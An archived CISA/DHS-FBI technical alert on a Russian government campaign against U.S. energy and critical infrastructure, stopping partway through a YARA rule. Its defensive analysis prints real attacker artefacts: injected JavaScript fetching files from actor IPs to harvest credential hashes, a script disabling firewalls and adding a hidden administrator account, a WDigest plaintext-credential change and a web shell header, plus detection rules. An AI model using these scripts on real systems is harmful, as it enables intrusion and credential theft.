{
	"id": "a8e1cff2-0621-4695-ade6-c69df118f531",
	"created_at": "2026-04-06T00:20:19.825933Z",
	"updated_at": "2026-04-10T03:36:24.696552Z",
	"deleted_at": null,
	"sha1_hash": "08b57e20c50b48753f3f067341d566a8a7b90304",
	"title": "Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 125973,
	"plain_text": "Russian Government Cyber Activity Targeting Energy and Other\r\nCritical Infrastructure Sectors | CISA\r\nPublished: 2018-03-16 · Archived: 2026-04-05 21:46:49 UTC\r\nSystems Affected\r\nDomain Controllers\r\nFile Servers\r\nEmail Servers\r\nOverview\r\nThis joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the\r\nFederal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S.\r\nGovernment entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical\r\nmanufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and\r\nprocedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this\r\nalert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.\r\nDHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who\r\ntargeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote\r\naccess into energy sector networks. 
After obtaining access, the Russian government cyber actors conducted network\r\nreconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).\r\nThe following IOC packages and associated files are no longer available for download:\r\nTA18-074A_TLP_WHITE.csv\r\nTA18-074A_TLP_WHITE.stix.xml\r\nMIFR-10127623_TLP_WHITE.pdf\r\nMIFR-10127623_TLP_WHITE_stix.xml\r\nMIFR-10128327_TLP_WHITE.pdf\r\nMIFR-10128327_TLP_WHITE_stix.xml\r\nMIFR-10128336_TLP_WHITE.pdf\r\nMIFR-10128336_TLP_WHITE_stix.xml\r\nMIFR-10128830_TLP_WHITE.pdf\r\nMIFR-10128830_TLP_WHITE_stix.xml\r\nMIFR-10128883_TLP_WHITE.pdf\r\nMIFR-10128883_TLP_WHITE_stix.xml\r\nMIFR-10135300_TLP_WHITE.pdf\r\nMIFR-10135300_TLP_WHITE_stix.xml\r\nContact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical\r\nassistance.\r\nSince at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government\r\nentities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation,\r\nand critical manufacturing sectors.\r\nAnalysis by DHS and FBI resulted in the identification of distinct indicators and behaviors related to this activity. Of note,\r\nthe report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6,\r\n2017, provides additional information about this ongoing campaign. [1]\r\nThis campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral\r\norganizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this\r\nalert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final\r\nintended victims. 
NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also\r\nreferred to as the “intended target.”\r\nTechnical Details\r\nThe threat actors in this campaign employed a variety of TTPs, including\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 1 of 15\n\nspear-phishing emails (from compromised legitimate account),\nwatering-hole domains,\ncredential gathering,\nopen-source and network reconnaissance,\nhost-based exploitation, and\ntargeting industrial control system (ICS) infrastructure.\nUsing Cyber Kill Chain for Analysis\nDHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of\nthe model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on\nthe objective. This section will provide a high-level overview of threat actors’ activities within this framework.\nStage 1: Reconnaissance\nThe threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of\nopportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the\nthreat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance\nphase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design\nand control system capabilities within organizations. These tactics are commonly used to collect the information needed for\ntargeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may\nappear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a\nsmall photo from a publicly accessible human resources page. 
The image, when expanded, was a high-resolution photo that\ndisplayed control systems equipment models and status information in the background.\nAnalysis also revealed that the threat actors used compromised staging targets to download the source code for several\nintended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.\nStage 2: Weaponization\nSpear-Phishing Email TTPs\nThroughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office\nfunctions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of\nthis request is: file[:]///Normal.dotm). As a part of the standard processes executed by Microsoft Word,\nthis request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving\nthe requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash,\nthe threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat\nactors are able to masquerade as authorized users in environments that use single-factor authentication. [2]\nUse of Watering Hole Domains\nOne of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the\ninfrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are\ntrade publications and informational websites related to process control, ICS, or critical infrastructure. Although these\nwatering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to\ncontain and reference malicious content. 
The threat actors used legitimate credentials to access and directly modify the\nwebsite content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using\nSMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file\n“header.php”, a legitimate PHP file that carried out the redirected traffic.\n![](file[:]//62.8.193[.]206/main_logo.png) In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the\nwebsite to detect various aspects of the user’s browser. The file was modified to contain the contents below:\nvar i = document.createElement(\"img\");\ni.src = \"file[:]//184.154.150[.]66/ame_icon.png\";\ni.width = 3;\ni.height=2;\nStage 3: Delivery\r\nWhen compromising staging target networks, the threat actors used spear-phishing emails that differed from previously\r\nreported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT \u0026\r\nConfidential”) and contained a generic PDF document titled ``document.pdf. (Note the inclusion of two single back ticks at\r\nthe beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document\r\ncontained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password.\r\n(Note: no code within the PDF initiated a download.)\r\nIn previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process\r\ncontrol systems. 
The threat actors continued using these themes specifically against intended target organizations. Email\r\nmessages included references to common industrial control equipment and protocols. The emails used malicious Microsoft\r\nWord attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel,\r\nand invitations and policy documents to entice the user to open the attachment.\r\nStage 4: Exploitation\r\nThe threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained\r\nsuccessive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected\r\nto the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email\r\naddress and password mimicking a login page for a website.\r\nWhen exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents\r\nretrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This\r\nconnection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim.\r\nWhen a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users\r\nreceived a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information\r\nover TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report\r\nassociates this behavior to the Dragonfly threat actors in this campaign. [1]\r\nStage 5: Installation\r\nThe threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not\r\nused. 
[4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed\r\nmalicious files within intended targets.\r\nEstablishing Local Accounts\r\nThe threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial\r\nscript “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator\r\naccount and manipulate the firewall for remote access. The script was located in “C:\\Program Files\r\n(x86)\\Symantec\\Symantec Endpoint Protection Manager\\tomcat\\webapps\\ROOT\\”.\r\nContents of symantec_help.jsp\r\n____________________________________________________________________________________________________________________\r\n\u003c% Runtime.getRuntime().exec(\"cmd /C \\\"\" + System.getProperty(\"user.dir\") + \"\\\\..\\\\webapps\\\\ROOT\\\\\u003cenu.cmd\u003e\\\"\"); %\u003e\r\n____________________________________________________________________________________________________________________\r\nThe script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for\r\nRemote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators\r\ngroup to gain elevated privileges. 
This script contained hard-coded values for the group name “administrator” in Spanish,\r\nItalian, German, French, and English.\r\nContents of enu.cmd\r\n____________________________________________________________________________________________________________________\r\nnetsh firewall set opmode disable\r\nnetsh advfirewall set allprofiles state off\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\GloballyOpenPorts\\List\" /v 3389:TCP /t REG_SZ /d \"3389:TCP:*:Enabled:Remote Desktop\" /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\\GloballyOpenPorts\\List\" /v 3389:TCP /t REG_SZ /d \"3389:TCP:*:Enabled:Remote Desktop\" /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core\" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AllowMultipleTSSessions /t REG_DWORD /d 1 /f\r\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" /v MaxInstanceCount /t REG_DWORD /d 100 /f\r\nnet user MS_BACKUP \u003cRedacted_Password\u003e /add\r\nnet localgroup Administrators /add MS_BACKUP\r\nnet localgroup Administradores /add MS_BACKUP\r\nnet localgroup Amministratori /add MS_BACKUP\r\nnet localgroup Administratoren /add MS_BACKUP\r\nnet localgroup Administrateurs /add 
MS_BACKUP\r\nnet localgroup \"Remote Desktop Users\" /add MS_BACKUP\r\nnet user MS_BACKUP /expires:never\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v\r\nMS_BACKUP /t REG_DWORD /d 0 /f\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system /v dontdisplaylastusername /t\r\nREG_DWORD /d 1 /f\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system /v LocalAccountTokenFilterPolicy /t\r\nREG_DWORD /d 1 /f\r\nsc config termservice start= auto\r\nnet start termservice\r\n____________________________________________________________________________________________________________________\r\nDHS observed the threat actors using this and similar scripts to create multiple accounts within staging target networks.\r\nEach account created by the threat actors served a specific purpose in their operation. These purposes ranged from the\r\ncreation of additional accounts to cleanup of activity. DHS and FBI observed the following actions taken after the creation\r\nof these local accounts:\r\nAccount 1: Account 1 was named to mimic backup services of the staging target. This account was created by the malicious\r\nscript described earlier. The threat actor used this account to conduct open-source reconnaissance and remotely access\r\nintended targets.\r\nAccount 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed\r\naction was to create Account 3.\r\nAccount 3: Account 3 was created within the staging victim’s Microsoft Exchange Server. A PowerShell script created this\r\naccount during an RDP session while the threat actor was authenticated as Account 2. 
The naming conventions of the\r\ncreated Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last name).\r\nAccount 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator\r\naccount. Account 4 was then used to delete logs and cover tracks.\r\nScheduled Task\r\nIn addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their\r\nnewly created account every eight hours.\r\nVPN Software\r\nAfter achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On\r\none occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect\r\nto intended target networks.\r\nPassword Cracking Tools\r\nConsistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free\r\ntools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations suggest that these\r\nfiles were downloaded directly from publicly available locations such as GitHub. Forensic analysis indicates that many of\r\nthese tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors\r\ninstalled Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\\Users\\\u003cRedacted\r\nUsername\u003e\\Desktop\\OWAExchange\\.\r\nDownloader\r\nOnce inside of an intended target’s network, the threat actor downloaded tools from a remote server. 
The initial versions of\r\nthe file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.\r\nIn one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following\r\nactions:\r\nThe threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.\r\nThe files were renamed to new extensions, with INST.txt being renamed INST.exe.\r\nThe files were executed on the host and then immediately deleted.\r\nThe execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running\r\nprocess list of the compromised system of an intended target.\r\nThe registry value “ntdll” was added to the “HKEY_USERS\\\u003cUSER\r\nSID\u003e\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” key.\r\nPersistence Through .LNK File Manipulation\r\nThe threat actors manipulated LNK files, commonly known as Microsoft Windows shortcut files, to repeatedly gather user\r\ncredentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat\r\nactors exploited this built-in Windows functionality by setting the icon path to a remote server controlled by the actors.\r\nWhen the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session.\r\nDuring this process, the active user’s credentials are passed through the attempted SMB connection.\r\nFour of the observed LNK files were “SETROUTE.lnk”, “notepad.exe.lnk”, “Document.lnk” and “desktop.ini.lnk”. These\r\nnames appeared to be contextual, and the threat actor may use a variety of other file names while using this tactic. Two of\r\nthe remote servers observed in the icon path of these LNK files were 62.8.193[.]206 and 5.153.58[.]45. 
Below is the parsed\r\ncontent of one of the LNK files:\r\nParsed output for file: desktop.ini.lnk\r\nRegistry Modification\r\nThe threat actor would modify key systems to store plaintext credentials in memory. In one instance, the threat actor\r\nexecuted the following command.\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" /v UseLogonCredential /t REG_DWORD /d 1 /f\r\nStage 6: Command and Control\r\nThe threat actors commonly created web shells on the intended targets’ publicly accessible email and web servers. The threat\r\nactors used three different filenames (“global.aspx”, “autodiscover.aspx” and “index.aspx”) for two different webshells. The\r\ndifference between the two groups was the “public string Password” field.\r\nBeginning Contents of the Web Shell\r\n____________________________________________________________________________________________________________________\r\n\u003c%@ Page Language=\"C#\" Debug=\"true\" trace=\"false\" validateRequest=\"false\" EnableViewStateMac=\"false\"\r\nEnableViewState=\"true\"%\u003e\r\n\u003c%@ import Namespace=\"System\"%\u003e\r\n\u003c%@ import Namespace=\"System.IO\"%\u003e\r\n\u003c%@ import Namespace=\"System.Diagnostics\"%\u003e\r\n\u003c%@ import Namespace=\"System.Data\"%\u003e\r\n\u003c%@ import Namespace=\"System.Management\"%\u003e\r\n\u003c%@ import Namespace=\"System.Data.OleDb\"%\u003e\r\n\u003c%@ import Namespace=\"Microsoft.Win32\"%\u003e\r\n\u003c%@ import Namespace=\"System.Net.Sockets\" %\u003e\r\n\u003c%@ import Namespace=\"System.Net\" %\u003e\r\n\u003c%@ import Namespace=\"System.Runtime.InteropServices\"%\u003e\r\n\u003c%@ import Namespace=\"System.DirectoryServices\"%\u003e\r\n\u003c%@ import Namespace=\"System.ServiceProcess\"%\u003e\r\n\u003c%@ import 
Namespace=\"System.Text.RegularExpressions\"%\u003e\r\n\u003c%@ Import Namespace=\"System.Threading\"%\u003e\r\n\u003c%@ Import Namespace=\"System.Data.SqlClient\"%\u003e\r\n\u003c%@ import Namespace=\"Microsoft.VisualBasic\"%\u003e\r\n\u003c%@ Import Namespace=\"System.IO.Compression\" %\u003e\r\n\u003c%@ Assembly\r\nName=\"System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A\"%\u003e\r\n\u003c%@ Assembly\r\nName=\"System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A\"%\u003e\r\n\u003c%@ Assembly\r\nName=\"System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A\"%\u003e\r\n\u003c%@ Assembly\r\nName=\"Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a\"%\u003e\r\n\u003c!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-\r\ntransitional.dtd\"\u003e\r\n\u003cscript runat = \"server\"\u003e\r\npublic string Password = \"\u003cREDACTED\u003e\";\r\npublic string z_progname = \"z_WebShell\";\r\n…\r\n____________________________________________________________________________________________________________________\r\nStage 7: Actions on Objectives\r\nDHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and\r\nOutlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended\r\ntargets.\r\nInternal Reconnaissance\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 6 of 15\n\nUpon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. 
DHS\r\nobserved the threat actors focusing on identifying and browsing file servers within the intended victim’s network.\r\nOnce on the intended target’s network, the threat actors used privileged credentials to access the victim’s domain controller\r\ntypically via RDP. Once on the domain controller, the threat actors used the batch scripts “dc.bat” and “dit.bat” to enumerate\r\nhosts, users, and additional information about the environment. The observed outputs (text documents) from these scripts\r\nwere:\r\nadmins.txt\r\ncompleted_dclist.txt\r\ncompleted_trusts.txt\r\ncompleted_zone.txt\r\ncomps.txt\r\nconditional_forwarders.txt\r\ndomain_zone.txt\r\nenum_zones.txt\r\nusers.txt\r\nThe threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors\r\ncompress all of these files into archives named “SYSTEM.zip” and “comps.zip”.\r\nThe threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information\r\nfrom hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of\r\nsystems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec\r\nDragonfly 2.0 report.\r\nIn at least two instances, the threat actors used batch scripts labeled “pss.bat” and “psc.bat” to run the PsExec tool.\r\nAdditionally, the threat actors would rename the tool PsExec to “ps.exe”.\r\n1. The batch script (“pss.bat” or “psc.bat”) is executed with domain administrator credentials.\r\n2. The directory “out” is created in the user’s %AppData% folder.\r\n3. PsExec is used to execute “scr.exe” across the network and to collect screenshots of systems in “ip.txt”.\r\n4. The screenshot’s filename is labeled based on the computer name of the host and stored in the target’s\r\nC:\\Windows\\Temp directory with a “.jpg” extension.\r\n5. 
The screenshot is then copied over to the newly created “out” directory of the system where the batch script was\r\nexecuted.\r\n6. In one instance, DHS observed an “out.zip” file created.\r\nDHS observed the threat actors create and modify a text document labeled “ip.txt” which is believed to have contained a list\r\nof host information. The threat actors used “ip.txt” as a source of hosts to perform additional reconnaissance efforts. In\r\naddition, the text documents “res.txt” and “err.txt” were observed being created as a result of the batch scripts being\r\nexecuted. In one instance, “res.txt” contained output from the Windows’ command “query user” across the network.\r\nUsing \u003cUsername\u003e \u003cPassword\u003e\r\nRunning -s cmd /c query user on \u003cHostname1\u003e\r\nRunning -s cmd /c query user on \u003cHostname2\u003e\r\nRunning -s cmd /c query user on \u003cHostname3\u003e\r\nUSERNAME     SESSIONNAME       ID    STATE    IDLE TIME      LOGON TIME\r\n\u003cuser1\u003e                                              2       Disc       1+19:34         6/27/2017 12:35 PM\r\nAn additional batch script named “dirsb.bat” was used to gather folder and file names from hosts on the network.\r\nIn addition to the batch scripts, the threat actors also used scheduled tasks to collect screenshots with “scr.exe”. In two\r\ninstances, the scheduled tasks were designed to run the command “C:\\Windows\\Temp\\scr.exe” with the argument\r\n“C:\\Windows\\Temp\\scr.jpg”. In another instance, the scheduled task was designed to run with the argument “pss.bat” from\r\nthe local administrator’s “AppData\\Local\\Microsoft\\” folder.\r\nThe threat actors commonly executed files out of various directories within the user’s AppData or Downloads folder. 
Some\r\ncommon directory names were\r\nChromex64,\r\nMicrosoft_Corporation,\r\nNT,\r\nOffice365,\r\nTemp, and\r\nUpdate.\r\nTargeting of ICS and SCADA Infrastructure\r\nIn multiple instances, the threat actors accessed workstations and servers on a corporate network that contained data output\r\nfrom control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory\r\ncontrol and data acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these files were named\r\ncontaining ICS vendor names and ICS reference documents pertaining to the organization (e.g., “SCADA WIRING\r\nDIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).\r\nThe threat actors targeted and copied profile and configuration information for accessing ICS systems on the network. DHS\r\nobserved the threat actors copying Virtual Network Connection (VNC) profiles that contained configuration information on\r\naccessing ICS systems. DHS was able to reconstruct screenshot fragments of a Human Machine Interface (HMI) that the\r\nthreat actors accessed.\r\nCleanup and Cover Tracks\r\nIn multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The\r\naccounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote\r\nServices, and Audit. The threat actors also removed applications they installed while they were in the network along with\r\nany logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that\r\nwere produced from its use. 
Finally, data generated by other accounts used on the systems accessed were deleted.\r\nThreat actors cleaned up intended target networks through deleting created screenshots and specific registry keys. Through\r\nforensic analysis, DHS determined that the threat actors deleted the registry key associated with terminal server client that\r\ntracks connections made to remote systems. The threat actors also deleted all batch scripts, output text documents and any\r\ntools they brought into the environment such as “scr.exe”.\r\nDetection and Response\r\nIOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI\r\nrecommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA\r\nrules provided, and add the IPs to their watchlists to determine whether malicious activity has been observed within their\r\norganization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these\r\nthreat actors.\r\nNetwork Signatures and Host-Based Rules\r\nThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with\r\nthreat actor TTPs. 
Although these network signatures and host-based rules were created using a comprehensive vetting\r\nprocess, the possibility of false positives always remains.\r\nNetwork Signatures\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains '/aspnet_client/system_web/4_0_30319/update/' (Beacon)\"; sid:42000000; rev:1; flow:established,to_server; content:\"/aspnet_client/system_web/4_0_30319/update/\"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\r\n___________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains '/img/bson021.dat'\"; sid:42000001; rev:1; flow:established,to_server; content:\"/img/bson021.dat\"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\r\n________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains '/A56WY' (Callback)\"; sid:42000002; rev:1; flow:established,to_server; content:\"/A56WY\"; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)\r\n_________________________________________\r\nalert tcp any any -\u003e any 445 (msg:\"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)\"; sid:42000003; rev:1; flow:established,to_server; content:\"|FF|SMB|75 00 00 00 00|\"; offset:4; depth:9; content:\"|08 00 01 00|\"; distance:3; content:\"|00 5c 5c|\"; distance:2; within:3; content:\"|5c|AME_ICON.PNG\"; distance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)\r\n________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI OPTIONS contains '/ame_icon.png' (SMB credential harvesting)\"; sid:42000004; rev:1; flow:established,to_server; 
content:\"/ame_icon.png\"; http_uri;\r\nfast_pattern:only; content:\"OPTIONS\"; nocase; http_method; classtype:bad-unknown; metadata:service http;)\r\n_________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP Client Header contains 'User-Agent|3a\r\n20|Go-http-client/1.1'\"; sid:42000005; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|Go-http-client/1.1|0d\r\n0a|Accept-Encoding|3a 20|gzip\"; http_header; fast_pattern:only; pcre:\"/\\.(?:aspx|txt)\\?[a-z0-9]{3}=[a-z0-9]{32}\u0026/U\";\r\nclasstype:bad-unknown; metadata:service http;)\r\n__________________________________________\r\nalert tcp $EXTERNAL_NET [139,445] -\u003e $HOME_NET any (msg:\"SMB Server Traffic contains NTLM-Authenticated\r\nSMBv1 Session\"; sid:42000006; rev:1; flow:established,to_client; content:\"|ff 53 4d 42 72 00 00 00 00 80|\";\r\nfast_pattern:only; content:\"|05 00|\"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;)\r\n \r\nYARA Rules\r\nThis is a consolidated rule set for malware associated with this activity. 
These rules were written by NCCIC and include\r\ncontributions from trusted partners.\r\nrule APT_malware_1\r\n{\r\nmeta:\r\n            description = \"inveigh pen testing tools \u0026 related artifacts\"\r\n            author = \"DHS | NCCIC Code Analysis Team\"    \r\n            date = \"2017/07/17\"\r\n            hash0 = \"61C909D2F625223DB2FB858BBDF42A76\"\r\n            hash1 = \"A07AA521E7CAFB360294E56969EDA5D6\"\r\n            hash2 = \"BA756DD64C1147515BA2298B6A760260\"\r\n            hash3 = \"8943E71A8C73B5E343AA9D2E19002373\"\r\n            hash4 = \"04738CA02F59A5CD394998A99FCD9613\"\r\n            hash5 = \"038A97B4E2F37F34B255F0643E49FC9D\"\r\n            hash6 = \"65A1A73253F04354886F375B59550B46\"\r\n            hash7 = \"AA905A3508D9309A93AD5C0EC26EBC9B\"\r\n            hash8 = \"5DBEF7BDDAF50624E840CCBCE2816594\"\r\n            hash9 = \"722154A36F32BA10E98020A8AD758A7A\"\r\n            hash10 = \"4595DBE00A538DF127E0079294C87DA0\"\r\nstrings:\r\n            $s0 = \"file://\"\r\n            $s1 = \"/ame_icon.png\"\r\n            $s2 = \"184.154.150.66\"\r\n            $s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }\r\n            $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }\r\n            $s5 = \"(g.charCodeAt(c)^l[(l[b]+l[e])%256])\"\r\n            $s6 = \"for(b=0;256\u003eb;b++)k[b]=b;for(b=0;256\u003eb;b++)\"\r\n            $s7 = \"VXNESWJfSjY3grKEkEkRuZeSvkE=\"\r\n            $s8 = \"NlZzSZk=\"\r\n            $s9 = \"WlJTb1q5kaxqZaRnser3sw==\"\r\n            $s10 = \"for(b=0;256\u003eb;b++)k[b]=b;for(b=0;256\u003eb;b++)\"\r\n            $s11 = \"fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])\"\r\n            $s12 = \"ps.exe -accepteula \\\\%ws% -u %user% -p %pass% -s cmd /c netstat\"\r\n            $s13 = { 
